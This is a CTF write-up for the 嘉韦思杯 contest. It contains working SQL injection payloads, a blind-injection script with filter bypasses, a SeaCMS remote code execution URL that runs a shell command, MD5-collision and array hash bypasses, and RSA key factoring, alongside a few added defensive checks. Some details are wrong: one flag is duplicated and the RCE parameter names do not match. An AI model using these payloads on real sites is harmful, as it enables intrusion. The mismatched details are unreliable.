嘉韦思杯 writeup

嘉韦思杯 [http://ctf.ecnu.edu.cn/]

土肥原贤二

A simple SQL injection.

Database: -1' union select database(),2,3,4

Database name: luozhen

Tables: -1' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4#

Table names: luozhen,flag,goods3

Columns: -1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4#

Column names: id,flag

Content: -1' union select 1,(select group_concat(flag) from luozhen.flag limit 0,1),3,4#

Final flag: flag{20_welcome_19}

吴佩孚

47.103.43.235:85/b/第一题_js?.txt

Base64-decode the text, then paste the resulting characters into the browser console and run them.

[Image: 嘉韦思杯1]

Final flag: flag{sdf465454dfgert32}

死亡真相 (The Truth About the Death)

Open the file with Audacity and look at the spectrogram, which shows:

[Image: 嘉韦思杯5]

flag:85a9d4517d4725_b9_8cbc9fd_554216
Well, that is a fake flag.

At the same time, the word zero appears several times in the file; replace _ with 0 and then look up the MD5 hash.

Final flag: flag{hsd132456}

日军空袭 (Japanese Air Raid)

Keep base64-decoding the text until you get fB__l621a4h4g_ai{&i}

[Image: 嘉韦思杯4]

The pattern: read every 4th character (stride 4, starting at each of the first four positions in turn), which gives flag{B64_&_2hai_14i}

戴星炳

Python script:

```python
# -*- encoding: utf-8 -*-
import re
import requests

URL = "http://47.103.43.235:82/web/a/index.php"

# keep the cookie across requests so the server sees one session
r = requests.session()

body = r.get(URL)
print(body.text)

# the page shows "...?</p><p><expression></p>"; capture the expression
# (the '?' has to be escaped, otherwise re raises "nothing to repeat")
jisuan = re.findall(r"\?</p><p>(.*?)</p>", body.text)
print(jisuan[0])

# evaluate the arithmetic expression the page hands out
flag = eval(jisuan[0])
print(flag)

data1 = {
    'result': flag
}

# post the answer back within the time limit, in the same session
flag = r.post(URL, data=data1)
print(flag.text)
```

Final flag: flag{Y0U_4R3_3o_F4ST!}

大美晚报

Scanning the QR code doesn't help...

Opening the file in Notepad shows the hint: key.txt | the administrator encrypted it with his QQ number

Using Kali:

Analyse and extract the file with binwalk

[Image: 大美日报]

There is a zip archive inside

Extract it with foremost

[Image: 大美日报2]

Final flag: flag{Y0U_4R3_3o_F4ST!}

袁殊

After downloading and extracting RSA256.tar.gz you get two files: fllllllag.txt | gy.key

Use the openssl tool in the Kali VM.

Run the command: openssl rsa -pubin -text -modulus -in warmup -in RSA256/RSA256/gy.key

Output:

```text
Public-Key: (256 bit)
Modulus:
00:a9:bd:4c:7a:77:63:37:0a:04:2f:e6:be:c7:dd:
c8:41:60:2d:b9:42:c7:a3:62:d1:b5:d3:72:a4:d0:
89:12:d9
Exponent: 65537 (0x10001)
Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9
writing RSA key
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKm9THp3YzcKBC/mvsfdyEFgLblCx6Ni
0bXTcqTQiRLZAgMBAAE=
-----END PUBLIC KEY-----
```

Converting Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9 to decimal gives Modulus=76775333340223961139427050707840417811156978085146970312315886671546666259161

Then factor the modulus into:

```text
a=273821108020968288372911424519201044333
b=280385007186315115828483000867559983517
```

[Image: 嘉韦思杯2]

Script:

```python
# -*- encoding: utf-8 -*-
import rsa

Modulus = 76775333340223961139427050707840417811156978085146970312315886671546666259161
a = 273821108020968288372911424519201044333
b = 280385007186315115828483000867559983517

Exponent = 65537

# private exponent d = e^-1 mod (a-1)(b-1); pow(e, -1, m) needs Python 3.8+
# (the original script used gmpy.invert for this step)
d = pow(Exponent, -1, (a - 1) * (b - 1))

privatekey = rsa.PrivateKey(Modulus, Exponent, d, a, b)  # build the private key

with open("./fllllllag.txt", "rb") as f:
    print(rsa.decrypt(f.read(), privatekey).decode())  # decrypt the ciphertext with the private key
```

Final flag: flag{_2o!9_CTF_ECUN_}
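The modulus conversion and private-exponent recovery from the factors above, as an added example that is not the writeup's own script: it parses the openssl hex modulus into the decimal value quoted above, verifies that a·b really equals it, derives d with the standard library instead of gmpy, and round-trips a constructed sample integer (the ciphertext file itself is not on this page).

```python
# Added example, not the writeup's own script. Values are the ones quoted
# above; the round-trip message is constructed for the demonstration.
MODULUS_HEX = "A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9"
N_DEC = 76775333340223961139427050707840417811156978085146970312315886671546666259161
P = 273821108020968288372911424519201044333
Q = 280385007186315115828483000867559983517
E = 65537


def hex_modulus_to_int(hex_modulus):
    """Parse the 'Modulus=' hex string printed by openssl into an integer."""
    return int(hex_modulus, 16)


def recover_private_exponent(n, p, q, e):
    """Return d = e^-1 mod (p-1)(q-1), refusing factors that do not multiply to n."""
    if p * q != n:
        raise ValueError("p * q != n: these are not the factors of this modulus")
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)  # modular inverse, Python 3.8+


def textbook_roundtrip(n, e, d, m):
    """Textbook RSA: encrypt integer m with (n, e), decrypt with d, return the result."""
    c = pow(m, e, n)
    return pow(c, d, n)


def modulus_bits(n):
    """Key size; a 256-bit modulus is far below the 2048 bits expected today."""
    return n.bit_length()


if __name__ == "__main__":
    n = hex_modulus_to_int(MODULUS_HEX)
    print("decimal matches writeup:", n == N_DEC, "bits:", modulus_bits(n))
    d = recover_private_exponent(n, P, Q, E)
    m = int.from_bytes(b"constructed sample", "big")  # constructed, well below n
    print("round trip ok:", textbook_roundtrip(n, E, d, m) == m)
```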

作战计划 (Battle Plan)

This challenge is about finding a CMS vulnerability: SeaCMS has a front-end arbitrary code execution vulnerability.

http://47.103.43.235:84/search.php?searchtype=5&tid=6&year=2014);phpinfo();//

[Image: 嘉韦思杯6.1]

Next, request:
http://47.103.43.235:84/search.php?searchtype=5&tid=6&year=2019);assert($_POST["raidsh"]);//

while sending the POST parameter: radish=system("cat $(find / -name flag*)")

Final flag: flag{!!seacms_@@}

晴气庆胤

The page source contains a hint:

```php
if ((string)$_POST['param1']!==(string)$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2']))
```

Capture the request and change the POST body to:

```text
param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
```

Flag: flag{MD5@_@success}
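An added check, not part of the writeup, that decodes the two percent-encoded values above and confirms they are different 64-byte strings with the same MD5 digest, i.e. exactly the condition the PHP snippet tests; the hardened variant runs the same comparison with SHA-256, which this pair no longer satisfies.

```python
import hashlib
import hmac
from urllib.parse import unquote_to_bytes

# Added example, not part of the writeup: the two percent-encoded POST values
# quoted above, checked the way the challenge's PHP condition checks them.
PARAM1 = ("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
          "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75"
          "%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2")
PARAM2 = ("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
          "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75"
          "%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2")


def decode_form_value(value):
    """Percent-decode one form value into the raw bytes PHP would see in $_POST."""
    return unquote_to_bytes(value)


def challenge_check(v1, v2):
    """Mirror of the PHP test: values differ as strings but md5() of each is identical."""
    b1, b2 = decode_form_value(v1), decode_form_value(v2)
    return b1 != b2 and hashlib.md5(b1).hexdigest() == hashlib.md5(b2).hexdigest()


def hardened_check(v1, v2):
    """Same test with SHA-256 and a constant-time compare; no known pair satisfies it."""
    b1, b2 = decode_form_value(v1), decode_form_value(v2)
    return b1 != b2 and hmac.compare_digest(hashlib.sha256(b1).digest(),
                                            hashlib.sha256(b2).digest())


def differing_offsets(v1, v2):
    """Byte offsets where the two decoded values differ (the collision's tweaked bytes)."""
    b1, b2 = decode_form_value(v1), decode_form_value(v2)
    return [i for i, (x, y) in enumerate(zip(b1, b2)) if x != y]


if __name__ == "__main__":
    print("lengths:", len(decode_form_value(PARAM1)), len(decode_form_value(PARAM2)))
    print("differ at byte offsets:", differing_offsets(PARAM1, PARAM2))
    print("md5 condition satisfied:", challenge_check(PARAM1, PARAM2))
    print("sha256 condition satisfied:", hardened_check(PARAM1, PARAM2))
```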

池步洲

A simple array bypass.

Looking at the page source reveals index.phps; download it and read the code:

```php
<?php
error_reporting(0);
$flag = '********';
if (isset($_POST['name']) and isset($_POST['password'])){
    if ($_POST['name'] == $_POST['password'])
        print 'name and password must be diffirent';
    else if (sha1($_POST['name']) === sha1($_POST['password']))
        die($flag);
    else print 'invalid password';
}
?>
```

Analysing the code (sha1() applied to an array returns false instead of a hash, which is what the array bypass relies on):

[Image: 池步洲]

Final flag: flag{Y0u_just_br0ke_sha1}

冈村宁次

Opening the challenge shows the following:

[Image: 嘉韦思杯3]

I thought it was just a simple injection, but after a few tries it turned out not to be as simple as expected.

Later I noticed that MQ== base64-decodes to 1.

Trying the parameter if(1,1,2): base64-encoded and then reversed it becomes pIDLxwSMoYWa
if(0,1,2): base64-encoded and then reversed it becomes pIDLxwCMoYWa

[Image: 嘉韦思杯7]

[Image: 嘉韦思杯8]

Spaces and the equals sign are filtered; they can be bypassed with inline comments (/*1 */) and like.

Python script:

```python
import base64
import requests


def string_reverse(m):
    # the challenge's encoding: base64-encode the payload, then reverse the string
    s = base64.b64encode(m.encode()).decode()
    return s[::-1]


url = "http://47.103.43.235:83/web/a/index.php?id="
flag = ""
for i in range(1, 40):
    for j in range(33, 128):
        # earlier stages (database name, table names, column names), kept for reference:
        # payload = "if((ascii(substr(database(),"+str(i)+",1))>"+str(j)+"),1,2)"
        # payload = "if((ascii(substr((selselectect/*a*/group_concat(table_name)/*a*/from/*a*/infoorrmation_schema.tables/*a*/ where/*a*/table_schema/*a*/like/*a*/ database()),"+str(i)+",1))>"+str(j)+"),1,2)"
        # payload = "if((ascii(substr((selselectect/*a*/ group_concat(column_name)/*a*/ from /*a*/infoorrmation_schema.columns/*a*/ where/*a*/ table_name/*a*/like/*a*/'flag'),"+str(i)+",1))>"+str(j)+"),1,2)"
        payload = "if((ascii(substr((seleselectct/*a*/flag /*a*/from/*a*/ flag),"+str(i)+",1))>"+str(j)+"),1,2)"
        payload = string_reverse(payload)
        r = requests.get(url + payload)
        # "2019-11-11" is the marker of the id=2 page, i.e. ascii(...) > j is false;
        # the first j for which that happens is the character's code
        if "2019-11-11" in r.text:
            flag += chr(j)
            print(flag)
            break
```

[Image: 嘉韦思杯9]

Final flag: flag{s9li_1s_s0_e4sY}
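From the defender's side, an added example that is not from the writeup: it undoes the challenge's encoding (reverse, then base64-decode) for the id parameter found in web-server log lines and flags values that decode to the if(...) / comment-stuffed payloads shown in this section; the log lines are constructed, the id values are the ones quoted above.

```python
import base64
import binascii
import re

# Added example, not part of the writeup. The log lines are constructed; the
# id values are the ones quoted in this section.
LOG_LINES = [
    '10.0.0.5 - - [11/Nov/2019:10:00:01 +0800] "GET /web/a/index.php?id=pIDLxwSMoYWa HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Nov/2019:10:00:02 +0800] "GET /web/a/index.php?id=pIDLxwCMoYWa HTTP/1.1" 200 498',
    '10.0.0.9 - - [11/Nov/2019:10:00:03 +0800] "GET /web/a/index.php?id=MQ== HTTP/1.1" 200 512',
]

# markers of the payloads above: if(...) conditionals, ascii/substr probing,
# inline comments standing in for spaces, doubled keywords that survive a strip
SUSPICIOUS = re.compile(
    r"\bif\s*\(|ascii\s*\(|substr\s*\(|/\*.*?\*/|sel\w*select\w*|information_schema", re.I)
ID_PARAM = re.compile(r"[?&]id=([A-Za-z0-9+/=]+)")


def decode_id(encoded):
    """Undo the challenge's encoding: reverse, then base64-decode; fall back to plain base64.

    Returns None when neither form decodes, so odd values are reported rather than dropped."""
    for candidate in (encoded[::-1], encoded):
        try:
            return base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None


def scan_log(lines):
    """Return a list of (raw_id, decoded_id, suspicious) for every request carrying an id."""
    findings = []
    for line in lines:
        m = ID_PARAM.search(line)
        if not m:
            continue
        decoded = decode_id(m.group(1))
        flagged = decoded is not None and bool(SUSPICIOUS.search(decoded))
        findings.append((m.group(1), decoded, flagged))
    return findings


if __name__ == "__main__":
    for raw, decoded, flagged in scan_log(LOG_LINES):
        print(f"{raw:16} -> {decoded!r:14} {'INJECTION' if flagged else 'ok'}")
```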